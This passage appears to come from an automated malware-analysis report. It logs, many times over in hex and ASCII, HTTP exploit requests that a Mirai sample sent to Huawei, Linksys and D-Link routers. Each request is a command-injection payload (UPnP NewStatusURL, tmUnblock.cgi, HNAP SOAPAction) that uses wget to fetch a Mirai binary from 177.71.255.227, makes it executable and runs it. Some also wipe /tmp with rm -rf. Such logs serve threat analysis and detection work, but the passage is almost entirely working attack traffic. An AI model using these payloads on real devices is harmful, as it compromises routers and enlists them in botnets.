67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
